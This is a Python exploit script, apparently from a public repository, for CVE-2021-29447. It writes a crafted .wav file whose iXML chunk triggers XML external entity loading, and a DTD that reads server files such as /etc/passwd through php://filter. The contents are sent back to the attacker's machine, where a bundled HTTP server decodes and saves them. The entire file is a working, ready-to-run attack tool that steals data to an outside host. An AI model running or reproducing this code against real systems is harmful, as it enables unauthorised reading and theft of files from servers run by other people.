-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathgenerate_payloads.py
executable file
·178 lines (145 loc) · 5.89 KB
/
generate_payloads.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
#!/usr/bin/python
import argparse
import base64
import logging
import os
from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

from colored_formatter import ColoredFormatter
# Let every record through the root logger; filtering is left to the handlers.
logging.root.setLevel(logging.NOTSET)
# NOTE(review): the logger is named after the script path (__file__) rather
# than the conventional __name__ -- confirm this is intentional.
logger = logging.getLogger(__file__)
# Stream handler (stderr by default) formatted by the project-local
# ColoredFormatter.
color_handler = logging.StreamHandler()
color_handler.setLevel(logging.DEBUG)
color_handler.setFormatter(ColoredFormatter())
logger.addHandler(color_handler)
# Files requested from the target when --files-to-fetch is not given.
DEFAULT_REMOTE_FILES_TO_FETCH = [
"/etc/passwd",
"/etc/nginx/sites-enabled/default",
]
# Delimiter placed between file entries in the callback URL; the HTTP handler
# turns it back into "&" before parsing the query string.
SEPARATOR = "---"
class ExploitHandler(BaseHTTPRequestHandler):
    """Request handler that serves the DTD file and stores the called-back data.

    Three kinds of GET request are distinguished by their path:

    * ``/<dtd_payload>`` -- the DTD file is read from disk and sent back;
    * ``/?...`` -- the query string carries base64-encoded file contents, which
      are decoded and written to the current working directory;
    * anything else -- the path is only logged at debug level.

    Every request is answered with ``200`` and a ``text/plain`` content type.
    """

    def __init__(self, dtd_payload, *args, **kwargs):
        # The attribute has to exist before the base initializer runs, because
        # the base class handles the request from inside its own __init__.
        self.dtd_payload = dtd_payload
        super().__init__(*args, **kwargs)

    def do_HEAD(self):
        """Send a 200 status line and a text/plain Content-type header."""
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()

    def do_GET(self):
        """Send the headers, then dispatch on the request path."""
        self.do_HEAD()
        request_path = self.path

        if request_path == f"/{self.dtd_payload}":
            self._serve_dtd()
            return
        if request_path.startswith("/?"):
            self._store_received_files(request_path)
            return
        logger.debug(request_path)

    def _serve_dtd(self):
        """Write the DTD file's bytes to the response body."""
        with open(self.dtd_payload, "rb") as dtd_file:
            dtd_bytes = dtd_file.read()
        self.wfile.write(dtd_bytes)
        logger.info(
            "dtd payload has been succesfully loaded onto the target server."
        )
        logger.info(
            "We should expect a callback shortly, if nothing happens this might mean that one of the requested files does not exist on the target system"
        )

    def _store_received_files(self, request_path):
        """Parse the callback query string and write each file it carries."""
        # Entries are joined with SEPARATOR in the callback URL; restoring "&"
        # lets the standard query-string parser split them.
        query = urlparse(request_path.replace(SEPARATOR, "&")).query
        received = parse_qs(query)
        received_names = ", ".join(received.keys())
        logger.info(f"Received the following files: {received_names}")
        write_extracted_files(sanitize_extracted_files(received))
        logger.info("The files have been written to the current working directory")

    def log_message(self, format, *args):
        """Suppress the base class's per-request logging."""
        return None
def create_args_parser():
    """Build the command-line parser for the payload generator.

    Returns:
        argparse.ArgumentParser: a parser whose namespace exposes
        ``local_ip``, ``local_port``, ``media_payload``, ``dtd_payload`` and
        ``files_to_fetch``.
    """
    parser = argparse.ArgumentParser(description="CVE-2021-29447 payload generator")
    parser.add_argument(
        "--local-ip",
        type=str,
        dest="local_ip",
        # Without an address both generated files would contain the literal
        # host "None", so fail early with a usage error instead.
        required=True,
        help="Local machine IP address",
    )
    parser.add_argument(
        "--local-port",
        type=int,
        dest="local_port",
        default=4444,
        help="Local machine port which will run an HTTP server to receive the exfiltrated files",
    )
    parser.add_argument(
        "--media-payload",
        type=str,
        dest="media_payload",
        default="payload.wav",
        help="Name of the .wav file containing the exploit to be generated",
    )
    parser.add_argument(
        "--dtd-payload",
        type=str,
        dest="dtd_payload",
        default="index.dtd",
        help="Name of the .dtd file containing the exploit to be generated",
    )
    parser.add_argument(
        "--files-to-fetch",
        dest="files_to_fetch",
        nargs="+",
        default=DEFAULT_REMOTE_FILES_TO_FETCH,
        help="Paths of the remote files to request, separated by spaces",
    )
    return parser
def sanitize_extracted_files(
    extracted_files: Dict[str, List[str]]
) -> Dict[str, str]:
    """Reduce parsed query values to one base64 string per file name.

    Query-string parsing yields a list of values per key and decodes "+" as a
    space; base64 text uses "+" as a regular symbol, so the spaces are turned
    back into "+" here.

    Args:
        extracted_files: mapping of file name to the list of values parsed
            from the query string. Only the first value of each list is used.

    Returns:
        A new mapping of file name to its repaired base64 string. The input
        mapping is left untouched, and keys with no values are omitted.
    """
    return {
        name: values[0].replace(" ", "+")
        for name, values in extracted_files.items()
        if values
    }
def write_extracted_files(extracted_files: Dict[str, str]) -> None:
    """Decode each base64 payload and store it in the current working directory.

    Args:
        extracted_files: mapping of file name to base64-encoded content.

    Raises:
        binascii.Error: if a payload is not valid base64.
        OSError: if a file cannot be written.
    """
    for requested_name, encoded_content in extracted_files.items():
        # The names come from an unauthenticated HTTP request, so directory
        # components are dropped to keep every write inside the working
        # directory.
        file_name = os.path.basename(requested_name)
        if file_name in ("", ".", ".."):
            logger.warning("Skipping unusable file name: %r", requested_name)
            continue
        # Decode before opening so a malformed payload leaves no empty file.
        content = base64.b64decode(encoded_content)
        # Binary mode stores the bytes exactly as received and also works for
        # content that is not valid UTF-8.
        with open(file_name, "wb") as new_file:
            new_file.write(content)
def generate_wav_media_payload(
    media_payload_file_path: str, ip_address: str, port: str, dtd_payload_file_path: str
):
    """Write the .wav file whose iXML chunk points at the hosted DTD.

    Args:
        media_payload_file_path: where the .wav file is written.
        ip_address: host placed in the DTD URL.
        port: port placed in the DTD URL.
        dtd_payload_file_path: path component of the DTD URL.
    """
    logger.info(
        f"Generating media payload [connect_back ip address: {ip_address}, connect back port: {port}]"
    )

    # The RIFF and iXML size fields are fixed bytes taken as-is; they are not
    # recomputed from the length of the XML that follows.
    wav_contents = f"RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://{ip_address}:{port}/{dtd_payload_file_path}'>%remote;%init;%trick;]>\x00"

    # latin-1 maps every code point below 256 to the same byte value, so the
    # \x.. escapes in the header reach the file as raw bytes.
    with open(media_payload_file_path, "w", encoding="latin-1") as wav_file:
        wav_file.write(wav_contents)

    logger.info(f"Payload generated and stored in {media_payload_file_path}")
def generate_dtd_payload(
    dtd_payload_file_path: str, files_to_fetch: List[str], ip_address: str, port: str
):
    """Write the DTD file that reads the requested files and calls back with them.

    For every requested path one parameter entity is declared that reads the
    file through a base64-encoding filter. A final entity builds the callback
    URL, listing each ``name=%name;`` pair followed by SEPARATOR.

    Args:
        dtd_payload_file_path: where the DTD file is written.
        files_to_fetch: remote paths to request.
        ip_address: host of the callback URL.
        port: port of the callback URL.
    """
    logger.info(
        f"Generating the dtd payload to extract the following files: {', '.join(files_to_fetch)}"
    )

    # Pair each path with its entity name: the path with "/" replaced by "_".
    named_paths = [(path, path.replace("/", "_")) for path in files_to_fetch]

    file_entities = "".join(
        f'<!ENTITY % {entity} SYSTEM "php://filter/read=convert.base64-encode/resource={path}">'
        for path, entity in named_paths
    )
    callback_query = "".join(
        f"{entity}=%{entity};{SEPARATOR}" for _path, entity in named_paths
    )
    callback_entity = (
        f"<!ENTITY % init \"<!ENTITY % trick SYSTEM 'http://{ip_address}:{port}/?"
        + callback_query
        + "'>\" >"
    )

    with open(dtd_payload_file_path, "w") as dtd_file:
        dtd_file.write(file_entities + callback_entity)
def main():
    """Generate both payload files, then serve HTTP until interrupted.

    Parses the command line, writes the .wav and .dtd files, and starts an
    HTTP server on all interfaces at the chosen port. Ctrl-C stops the server
    and releases its socket.
    """
    args = create_args_parser().parse_args()
    ip_address = args.local_ip
    port = args.local_port
    dtd_payload = args.dtd_payload

    generate_wav_media_payload(args.media_payload, ip_address, port, dtd_payload)
    generate_dtd_payload(dtd_payload, args.files_to_fetch, ip_address, port)

    # HTTPServer instantiates the handler itself, so the DTD file name is
    # bound ahead of time with partial().
    handler = partial(ExploitHandler, dtd_payload)

    # The context manager closes the listening socket on every exit path.
    with HTTPServer(("", int(port)), handler) as server:
        logger.info("Starting server, use <Ctrl-C> to stop")
        try:
            server.serve_forever()
        except KeyboardInterrupt:
            # Ctrl-C is the advertised way to stop; exit without a traceback.
            logger.info("Server stopped")


if __name__ == "__main__":
    main()